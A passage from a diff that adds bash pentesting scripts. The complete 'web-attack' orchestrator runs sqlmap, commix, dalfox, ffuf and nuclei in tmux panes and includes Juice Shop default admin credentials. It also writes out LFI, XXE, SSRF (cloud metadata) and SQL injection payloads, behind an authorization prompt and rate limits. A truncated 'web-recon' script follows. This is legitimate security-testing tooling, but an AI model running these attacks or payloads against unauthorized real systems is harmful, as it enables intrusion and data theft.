readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
# Print usage, authorization warning, test list and workflow notes.
# Globals (read): VERSION, color constants
show_help() {
  echo -e "${BOLD}web-attack${NC} - OWASP Top 10 Exploitation Testing v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo " web-attack <url>"
  echo
  echo -e "${BOLD}DESCRIPTION:${NC}"
  echo " Active exploitation testing for OWASP Top 10 vulnerabilities"
  echo " Creates tmux window with 6 panes running parallel attacks"
  echo
  echo -e "${BOLD}⚠️ AUTHORIZATION REQUIRED ⚠️${NC}"
  echo -e " ${RED}Only use on:${NC}"
  echo " ✓ localhost/127.0.0.1 (your own systems)"
  echo " ✓ Authorized penetration testing targets"
  echo " ✓ Bug bounty programs (within scope)"
  echo " ✓ Lab environments (DVWA, Juice Shop, etc.)"
  echo
  echo " ✗ NEVER use on unauthorized targets"
  echo " ✗ Illegal without explicit permission"
  echo
  echo -e "${BOLD}TESTS PERFORMED:${NC}"
  echo " 1. SQL Injection (sqlmap)"
  echo " 2. XSS Detection (dalfox)"
  echo " 3. Command Injection (commix)"
  echo " 4. XXE / SSRF Testing"
  echo " 5. Authentication Bypass"
  echo " 6. LFI/RFI Testing"
  echo
  echo -e "${BOLD}RECOMMENDED WORKFLOW:${NC}"
  echo " ${GREEN}1.${NC} Run reconnaissance first:"
  echo " ${BOLD}web-recon http://localhost:3002${NC}"
  echo " (Discovers endpoints, forms, parameters)"
  echo
  echo " ${GREEN}2.${NC} Then run exploitation:"
  echo " ${BOLD}web-attack http://localhost:3002${NC}"
  echo " (Tests discovered attack surface)"
  echo
  echo " ${YELLOW}⚠${NC} Running web-attack alone will find fewer vulnerabilities"
  echo " ${YELLOW}⚠${NC} Tools need discovered endpoints/parameters for best results"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo " web-attack http://localhost:3002"
  echo " web-attack http://localhost:8080 # DVWA"
  echo
  echo -e "${BOLD}OUTPUT:${NC}"
  echo " All results saved to: ./web-attack-<target>-<timestamp>/"
  echo
  echo -e "${BOLD}SAFETY FEATURES:${NC}"
  echo " • Localhost check (warns for non-local targets)"
  echo " • Rate limiting (--throttle)"
  echo " • No destructive payloads by default"
  echo " • PoC-focused (prove vulnerability, don't exploit)"
}
|
||||||
|
|
||||||
|
# Authorization check
|
||||||
|
# Verify the user is authorized to attack the target URL.
# Localhost and CTF-lab (.htb/.thm) hosts are auto-approved; anything
# else requires explicit interactive confirmation.
# Arguments: $1 - target URL
# Returns:   0 when authorized; exits 1 when the user declines.
check_authorization() {
  local url="$1"

  # Extract hostname: strip scheme, then port and path.
  # Declaration split from assignment so pipeline failures are visible.
  local hostname
  hostname=$(echo "$url" | sed -E 's~https?://~~' | cut -d: -f1 | cut -d/ -f1)

  # Localhost targets are always authorized.
  # BUGFIX: the regex previously used '\\.' which, inside [[ =~ ]],
  # matches a literal backslash - so 127.0.0.1 / 0.0.0.0 never matched
  # and always fell through to the interactive prompt. '\.' matches
  # a literal dot as intended.
  if [[ "$hostname" =~ ^(localhost|127\.0\.0\.1|0\.0\.0\.0)$ ]]; then
    echo -e "${GREEN}✓${NC} Target is localhost - authorized"
    return 0
  fi

  # HackTheBox / TryHackMe lab domains are authorized by definition.
  # BUGFIX: same '\\.' -> '\.' correction as above.
  if [[ "$hostname" =~ \.(htb|thm)$ ]]; then
    echo -e "${GREEN}✓${NC} Target is CTF platform - authorized"
    return 0
  fi

  # Warn for external targets and require an explicit confirmation.
  echo -e "${RED}⚠️ WARNING:${NC} Target is NOT localhost!"
  echo -e "${YELLOW}Target:${NC} $hostname"
  echo
  echo -e "${BOLD}Do you have written authorization to test this target?${NC}"
  echo " • Signed penetration testing agreement?"
  echo " • Bug bounty program with this target in scope?"
  echo " • Own the target infrastructure?"
  echo
  read -p "Type 'YES' to confirm authorization: " -r confirm

  if [[ "$confirm" != "YES" ]]; then
    echo -e "${RED}Authorization not confirmed. Exiting.${NC}"
    exit 1
  fi

  echo -e "${GREEN}✓${NC} Authorization confirmed by user"
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
# Verify tooling: tmux is mandatory; attack tools are optional and their
# absence only skips the corresponding scan, with an install hint printed.
# Exits 1 when a required tool is missing.
check_tools() {
  local missing=()
  local optional_missing=()
  local tool

  # Core tools
  command -v tmux &>/dev/null || missing+=("tmux")

  # Attack tools (all optional but warn)
  for tool in sqlmap dalfox nuclei ffuf commix; do
    command -v "$tool" &>/dev/null || optional_missing+=("$tool")
  done

  if (( ${#missing[@]} > 0 )); then
    echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
    exit 1
  fi

  if (( ${#optional_missing[@]} > 0 )); then
    echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
    echo -e "${CYAN}Install with:${NC}"
    for tool in "${optional_missing[@]}"; do
      case "$tool" in
        sqlmap) echo " sudo apt install sqlmap (or: pipx install sqlmap-dev)" ;;
        dalfox) echo " go install github.com/hahwul/dalfox/v2@latest" ;;
        nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
        ffuf) echo " go install github.com/ffuf/ffuf/v2@latest" ;;
        commix) echo " pipx install commix" ;;
      esac
    done
    echo
  fi
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
# Find most recent web-recon data for this target
|
||||||
|
# Find the most recent web-recon output directory for this target.
# Echoes the directory name and returns 0 only when a matching directory
# exists, contains urls.txt, and is less than 24 hours old; returns 1
# otherwise (callers treat that as "no usable recon data").
# NOTE(review): `tr -d 'http'` deletes every 'h', 't' and 'p' character,
# not the literal "http" prefix - presumably unintended, but it must stay
# in sync with the identical transform used where these dirs are created.
find_recon_data() {
  local url="$1"
  local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')

  # Look for web-recon directories matching this target (most recent first;
  # `local` deliberately masks the non-zero ls status when nothing matches)
  local recon_dir=$(ls -dt web-recon-*"${clean_url}"* 2>/dev/null | head -1)

  if [[ -n "$recon_dir" ]] && [[ -f "$recon_dir/urls.txt" ]]; then
    # Check if recon data is recent (within last 24 hours).
    # stat -c %Y is GNU coreutils; stat -f %m is the BSD/macOS fallback.
    local recon_age=$(stat -c %Y "$recon_dir" 2>/dev/null || stat -f %m "$recon_dir" 2>/dev/null)
    local current_time=$(date +%s)
    local age_hours=$(( ($current_time - $recon_age) / 3600 ))

    if [[ $age_hours -lt 24 ]]; then
      echo "$recon_dir"
      return 0
    fi
  fi

  return 1
}
|
||||||
|
|
||||||
|
# Create the timestamped output tree for this attack run and, when
# available, import the URL list from a recent web-recon run of the same
# target. Sets globals: OUTPUT_DIR, RECON_DIR, RECON_URLS.
setup_output_dir() {
  local url="$1"
  local timestamp=$(date +%Y%m%d-%H%M%S)
  # NOTE(review): `tr -d 'http'` strips every h/t/p character rather than
  # the literal prefix; kept as-is so the naming keeps matching the glob
  # in find_recon_data and the directories created by web-recon.
  local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')

  OUTPUT_DIR="web-attack-${clean_url}-${timestamp}"
  mkdir -p "$OUTPUT_DIR"
  mkdir -p "$OUTPUT_DIR/sqlmap"
  mkdir -p "$OUTPUT_DIR/commix"

  echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"

  # Check for recent web-recon data.
  # BUGFIX: find_recon_data returns 1 when nothing recent exists; without
  # the || guard that non-zero assignment status aborts the whole script
  # under `set -e` before the fallback branch below can run.
  RECON_DIR=$(find_recon_data "$url") || RECON_DIR=""
  if [[ -n "$RECON_DIR" ]]; then
    echo -e "${CYAN}[*]${NC} Found recent recon data: ${BOLD}$RECON_DIR${NC}"

    # Copy recon URLs for exploitation tools
    if [[ -f "$RECON_DIR/urls.txt" ]] && [[ -s "$RECON_DIR/urls.txt" ]]; then
      cp "$RECON_DIR/urls.txt" "$OUTPUT_DIR/recon-urls.txt"
      local url_count=$(wc -l < "$OUTPUT_DIR/recon-urls.txt")
      echo -e "${GREEN}✓${NC} Imported ${BOLD}${url_count} URLs${NC} from web-recon for testing"
      RECON_URLS="$OUTPUT_DIR/recon-urls.txt"
    fi
  else
    echo -e "${YELLOW}⚠${NC} No recent web-recon data - tools will use deep crawl mode"
    echo -e "${CYAN}Tip:${NC} Run ${BOLD}web-recon $url${NC} first for better results"
    RECON_URLS=""
  fi
}
|
||||||
|
|
||||||
|
# Attempt to get authentication token for Juice Shop
|
||||||
|
# Attempt to log in to OWASP Juice Shop with its well-known training
# admin credentials and capture the JWT for authenticated scanning.
# Sets the global AUTH_TOKEN on success; returns 1 (with AUTH_TOKEN left
# empty) on any failure so callers can continue unauthenticated.
get_juice_shop_auth() {
  local url="$1"

  # Only applies to the local Juice Shop instance (localhost:3002)
  if [[ ! "$url" =~ localhost:3002 ]]; then
    return 1
  fi

  echo -e "${CYAN}[*]${NC} Detected Juice Shop - attempting authentication..."

  # Login and extract JWT token (default Juice Shop admin credentials)
  local response=$(curl -s -X POST "${url}/rest/user/login" \
    -H "Content-Type: application/json" \
    -d '{"email":"admin@juice-sh.op","password":"admin123"}' 2>/dev/null)

  if [[ -z "$response" ]]; then
    echo -e "${YELLOW}⚠${NC} Could not connect to Juice Shop login endpoint"
    return 1
  fi

  # Extract token from response.
  # BUGFIX: guard the assignment - AUTH_TOKEN is a global (no `local` to
  # mask the status), so if jq is missing or the pipeline fails, the
  # non-zero status would kill the script under set -e / pipefail.
  AUTH_TOKEN=$(echo "$response" | jq -r '.authentication.token' 2>/dev/null) || AUTH_TOKEN=""

  if [[ -n "$AUTH_TOKEN" ]] && [[ "$AUTH_TOKEN" != "null" ]]; then
    echo -e "${GREEN}✓${NC} Successfully authenticated as admin@juice-sh.op"
    echo -e "${CYAN}[*]${NC} JWT token obtained (will be used by all tools)"
    return 0
  else
    echo -e "${YELLOW}⚠${NC} Authentication failed - continuing without auth"
    AUTH_TOKEN=""
    return 1
  fi
}
|
||||||
|
|
||||||
|
# Main web-attack function
|
||||||
|
# Orchestrate active exploitation against a single target URL:
# banner + interactive authorization gate, output-dir setup (imports
# recon URLs), optional Juice Shop JWT auth, then six parallel tmux
# panes running sqlmap / commix / dalfox / ffuf / nuclei / manual-test
# prep. Falls back to run_attacks_sequential when not inside tmux.
run_web_attack() {
  local url="$1"

  # Ensure URL has http:// or https://
  if [[ ! "$url" =~ ^https?:// ]]; then
    url="http://$url"
    echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
  fi

  echo -e "${RED}${BOLD}"
  echo "╔════════════════════════════════════════════════════════════╗"
  echo "║ ⚠️ ACTIVE EXPLOITATION TESTING ⚠️ ║"
  echo "║ Target: $url"
  echo "║ AUTHORIZATION REQUIRED - LEGAL USE ONLY ║"
  echo "╚════════════════════════════════════════════════════════════╝"
  echo -e "${NC}"

  # Authorization check (interactive; exits unless the user confirms)
  check_authorization "$url"

  # Create output directory (also sets RECON_DIR / RECON_URLS globals)
  setup_output_dir "$url"

  # Attempt Juice Shop authentication.
  # BUGFIX: the helper returns 1 for non-Juice-Shop targets and on auth
  # failure; without `|| true` that status aborts the script under set -e.
  export AUTH_TOKEN=""
  get_juice_shop_auth "$url" || true

  # Check if in tmux
  if [[ -z "${TMUX:-}" ]]; then
    echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
    run_attacks_sequential "$url"
    return
  fi

  # BUGFIX: new tmux panes inherit the tmux SESSION environment, not this
  # script's exported variables, so the escaped \$AUTH_TOKEN the panes
  # expand would otherwise be empty. Publish the token to the session
  # environment so the pane shells can resolve it.
  if [[ -n "$AUTH_TOKEN" ]]; then
    tmux set-environment AUTH_TOKEN "$AUTH_TOKEN"
  fi

  # Create tmux window with 6 panes
  tmux new-window -n "--> ATTACK: ${url:0:15}... <--"

  # Create 3x2 grid (6 panes total)
  # CRITICAL: Tmux renumbers panes during splits, pane 0 disappears
  # Strategy: Create 3 columns first, then split each vertically
  # Final layout:
  #   [1: sqlmap] [3: dalfox] [5: nuclei]
  #   [2: commix] [4: ffuf]   [6: manual]

  # Create 3 columns (horizontal splits)
  tmux split-window -h
  tmux split-window -h

  # Select leftmost pane and split vertically (creates bottom-left)
  tmux select-pane -t 0
  tmux split-window -v

  # Select middle pane and split vertically (creates bottom-middle)
  tmux select-pane -t 2
  tmux split-window -v

  # Select rightmost pane and split vertically (creates bottom-right)
  tmux select-pane -t 4
  tmux split-window -v

  # Note: tmux 'tiled' layout may choose 2x3 or 3x2 depending on terminal
  # size; both work - tmux optimizes based on available space.
  tmux select-layout tiled

  # Final pane numbering after tiled layout:
  #   If 2x3 (2 columns, 3 rows):   If 3x2 (3 columns, 2 rows):
  #     1 4                           1 3 5
  #     2 5                           2 4 6
  #     3 6

  # Pane 1 (top-left): SQLMap (SQL injection)
  # Rate-limited: 1 thread, 2 second delay to prevent target crash.
  tmux select-pane -t 1
  if command -v sqlmap &>/dev/null; then
    if [[ -n "$AUTH_TOKEN" ]]; then
      if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
        local url_count=$(wc -l < "$RECON_URLS")
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
      else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
      fi
    else
      if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
        local url_count=$(wc -l < "$RECON_URLS")
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
      else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
      fi
    fi
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ sqlmap not installed - skipping${NC}'" C-m
  fi

  # Pane 2 (bottom-left): Commix (command injection)
  tmux select-pane -t 2
  if command -v commix &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Commix: Command injection testing...${NC}' && timeout 120 commix -u '$url' --batch --crawl=2 --output-dir=commix 2>&1 | tee commix.log || echo 'Commix timeout or no vulns' && echo -e '${GREEN}✓ Commix complete${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ commix not installed - skipping${NC}'" C-m
  fi

  # Pane 3 (top-middle): Dalfox (XSS detection)
  # Rate-limited: 200ms delay between requests (balanced speed/safety).
  tmux select-pane -t 3
  if command -v dalfox &>/dev/null; then
    if [[ -n "$AUTH_TOKEN" ]]; then
      if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
        local url_count=$(wc -l < "$RECON_URLS")
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
      else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
      fi
    else
      if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
        local url_count=$(wc -l < "$RECON_URLS")
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
      else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
      fi
    fi
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ dalfox not installed - skipping${NC}'" C-m
  fi

  # Pane 4 (bottom-middle): FFUF (parameter fuzzing)
  tmux select-pane -t 4
  if command -v ffuf &>/dev/null; then
    # Check if payload script exists
    if command -v payload &>/dev/null; then
      tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} FFUF: Parameter fuzzing with payloads...${NC}' && payload sqli basic > sqli.txt && payload xss basic > xss.txt && echo 'admin' > users.txt && echo 'password' >> users.txt && ffuf -u '$url?id=FUZZ' -w sqli.txt -mc 200,500 -o ffuf-sqli.json 2>&1 | head -50 && echo -e '${GREEN}✓ FFUF complete${NC}'" C-m
    else
      tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ payload script not found - basic ffuf only${NC}' && echo \"' OR '1'='1\" > payloads.txt && ffuf -u '$url?id=FUZZ' -w payloads.txt -mc 200,500 2>&1 | head -50" C-m
    fi
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ ffuf not installed - skipping${NC}'" C-m
  fi

  # Pane 5 (top-right): Nuclei (exploit templates only)
  # Rate-limited: 10 requests/second, stagger start by 6 seconds.
  tmux select-pane -t 5
  if command -v nuclei &>/dev/null; then
    if [[ -n "$AUTH_TOKEN" ]]; then
      tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates (authenticated)...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -H 'Authorization: Bearer \$AUTH_TOKEN' -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
    else
      tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
    fi
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
  fi

  # Pane 6 (bottom-right): Manual LFI/XXE/SSRF testing
  tmux select-pane -t 6
  tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Manual vulnerability testing...${NC}' && echo 'Testing LFI/XXE/SSRF vectors...' && echo '# LFI Tests' > manual-tests.txt && echo '$url?file=../../../../etc/passwd' >> manual-tests.txt && echo '$url?page=....//....//etc/passwd' >> manual-tests.txt && echo '# XXE Test' >> manual-tests.txt && echo '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>' >> manual-tests.txt && echo '# SSRF Test' >> manual-tests.txt && echo '$url?url=http://169.254.169.254/latest/meta-data/' >> manual-tests.txt && cat manual-tests.txt && echo -e '${CYAN}[*] Manual tests prepared. Review and execute as needed.${NC}'" C-m

  # Focus back on sqlmap pane
  tmux select-pane -t 1

  echo
  echo -e "${GREEN}✓${NC} Tmux web-attack window created"
  echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> ATTACK: ${url:0:15}... <--${NC}"
  echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
  echo
  echo -e "${YELLOW}Rate Limiting:${NC} Tools staggered and rate-limited to prevent target crash"
  echo -e "${YELLOW}Target Safety:${NC} 500ms-1s delays, reduced threads, max 10 req/sec"
  echo -e "${YELLOW}Note:${NC} Review results carefully - automated tools have false positives"
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
# Fallback path used when the script is not running inside tmux: run each
# attack tool one after another inside the output directory.
# Globals: OUTPUT_DIR (read). Arguments: $1 - target URL.
# NOTE: each `command -v X && X ... || echo` chain prints its message when
# the tool is missing OR when the tool exits non-zero, and the trailing
# `|| echo` also keeps a scanner failure from aborting the script if
# set -e is active.
run_attacks_sequential() {
  local url="$1"

  cd "$OUTPUT_DIR"

  echo -e "\n${GREENSTAR} Running SQLMap...${NC}"
  command -v sqlmap &>/dev/null && sqlmap -u "$url" --batch --crawl=2 --level=2 --risk=2 -o --output-dir=sqlmap || echo "sqlmap not installed"

  echo -e "\n${GREENSTAR} Running Dalfox...${NC}"
  command -v dalfox &>/dev/null && dalfox url "$url" --deep-domxss -o dalfox.txt || echo "dalfox not installed"

  echo -e "\n${GREENSTAR} Running Nuclei exploits...${NC}"
  command -v nuclei &>/dev/null && nuclei -u "$url" -s critical,high -o nuclei-exploits.txt || echo "nuclei not installed"

  echo -e "\n${GREENSTAR} Running Commix...${NC}"
  # 120s cap: commix can hang on unresponsive targets
  command -v commix &>/dev/null && timeout 120 commix -u "$url" --batch --output-dir=commix || echo "commix not installed or no vulns"

  cd ..

  echo -e "\n${GREEN}✓${NC} Web attack complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
# ---------------------------------------------------------------------------
# Entry point: argument parsing and dispatch.
# ---------------------------------------------------------------------------
if (( $# == 0 )) || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

url="$1"

# Reject an explicitly empty first argument (e.g. `web-attack ""`)
if [[ -z "$url" ]]; then
  echo -e "${RED}Error:${NC} URL required"
  echo "Usage: web-attack <url>"
  exit 1
fi

# Verify tooling is present before doing anything
check_tools

# Launch the attack orchestration
run_web_attack "$url"
|
||||||
265
scripts/pentesting/web-recon
Executable file
265
scripts/pentesting/web-recon
Executable file
|
|
@ -0,0 +1,265 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: web-recon.sh
|
||||||
|
# Description: Web application reconnaissance with tmux orchestration
|
||||||
|
# Usage: web-recon <url>
|
||||||
|
# Creates tmux window with parallel web scans (nuclei, feroxbuster, katana, arjun)
|
||||||
|
|
||||||
|
# Script version, shown in the help banner
VERSION="2.0.0"

# ANSI color codes (NC resets); readonly to prevent accidental clobbering
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Bracketed status prefixes used throughout the script's output
readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
# Print the colorized usage/help text for web-recon to stdout.
show_help() {
  echo -e "${BOLD}web-recon${NC} - Web Application Reconnaissance v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo " web-recon <url>"
  echo
  echo -e "${BOLD}DESCRIPTION:${NC}"
  echo " Creates tmux window with 4 panes running parallel/pipelined web reconnaissance:"
  echo " - Pane 1 (top-left): nuclei (vulnerability scanner)"
  echo " - Pane 2 (top-right): feroxbuster → arjun (pipeline)"
  echo " - Pane 3 (bottom-left): katana (web crawler with JS parsing)"
  echo " - Pane 4 (bottom-right): live results dashboard"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo " web-recon http://target.htb"
  echo " web-recon https://example.com"
  echo " web-recon 10.10.10.5"
  echo
  echo -e "${BOLD}OUTPUT:${NC}"
  echo " All results saved to: ./web-recon-<target>-<timestamp>/"
  echo
  echo -e "${BOLD}WORKFLOW:${NC}"
  echo " - Nuclei & Katana: Run in parallel immediately"
  echo " - Feroxbuster (5 min) → Arjun: Pipeline (arjun waits for feroxbuster)"
  echo " - httpx: Live monitoring - probes URLs as they're discovered"
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
# Verify tool availability: tmux is mandatory (drives the pane layout);
# the web scanners are optional and their panes are skipped later, with
# install hints printed here.
check_tools() {
  local required_missing=()
  local skippable=()

  # Core tools
  command -v tmux &>/dev/null || required_missing+=("tmux")

  # Web tools (all optional but warn)
  local tool
  for tool in nuclei feroxbuster katana arjun; do
    command -v "$tool" &>/dev/null || skippable+=("$tool")
  done

  if [[ ${#required_missing[@]} -gt 0 ]]; then
    echo -e "${RED}Error:${NC} Missing required tools: ${required_missing[*]}"
    exit 1
  fi

  if [[ ${#skippable[@]} -gt 0 ]]; then
    echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${skippable[*]}"
    echo -e "${CYAN}Install with:${NC}"
    for tool in "${skippable[@]}"; do
      case "$tool" in
        nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
        feroxbuster) echo " cargo install feroxbuster (or: sudo apt install feroxbuster)" ;;
        katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
        arjun) echo " pipx install arjun" ;;
      esac
    done
    echo
  fi
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
# Create the timestamped output directory for this recon run.
# Sets global: OUTPUT_DIR. Arguments: $1 - target URL.
# NOTE(review): `tr -d 'http'` deletes every 'h', 't' and 'p' character,
# not the literal "http" prefix - the resulting name is mangled, but
# web-attack's find_recon_data applies the same transform to locate these
# directories, so changing one requires changing both.
setup_output_dir() {
  local url="$1"
  local timestamp=$(date +%Y%m%d-%H%M%S)
  local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')

  OUTPUT_DIR="web-recon-${clean_url}-${timestamp}"
  mkdir -p "$OUTPUT_DIR"

  echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Main web-recon function
|
||||||
|
# Orchestrate web reconnaissance: banner, output dir, then a 2x2 tmux
# grid running nuclei, a feroxbuster→arjun pipeline, katana, and a live
# results dashboard. Falls back to run_scans_sequential outside tmux.
run_web_recon() {
  local url="$1"

  # Ensure URL has http:// or https://
  if [[ ! "$url" =~ ^https?:// ]]; then
    url="http://$url"
    echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
  fi

  echo -e "${CYAN}${BOLD}"
  echo "╔════════════════════════════════════════════════════════════╗"
  echo "║ Web Application Reconnaissance ║"
  echo "║ Target: $url"
  echo "╚════════════════════════════════════════════════════════════╝"
  echo -e "${NC}"

  # Create output directory (sets OUTPUT_DIR)
  setup_output_dir "$url"

  # Check if in tmux
  if [[ -z "${TMUX:-}" ]]; then
    echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
    run_scans_sequential "$url"
    return
  fi

  # Create tmux window
  WINDOW_NAME="--> Web: ${url:0:20}... <--"
  tmux new-window -n "$WINDOW_NAME"

  # Create 2x2 grid layout.
  # CRITICAL: tmux renumbers panes during the splits below and pane 0
  # disappears; after `select-layout tiled` the panes are:
  #   [1: nuclei] [2: feroxbuster → arjun]
  #   [3: katana] [4: live dashboard]

  # Split horizontally first (left | right)
  tmux split-window -h

  # Split left column vertically
  tmux select-pane -t 0
  tmux split-window -v

  # Split right column vertically (target pane 2 after left split)
  tmux select-pane -t 2
  tmux split-window -v

  # Force tiled layout for perfect 2x2 grid (equal-sized panes)
  tmux select-layout tiled

  # Pane 1 (top-left): nuclei
  tmux select-pane -t 1
  if command -v nuclei &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nuclei vulnerability scan...${NC}' && nuclei -u '$url' -o nuclei.txt && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
  fi

  # Pane 2 (top-right): feroxbuster THEN arjun (pipeline)
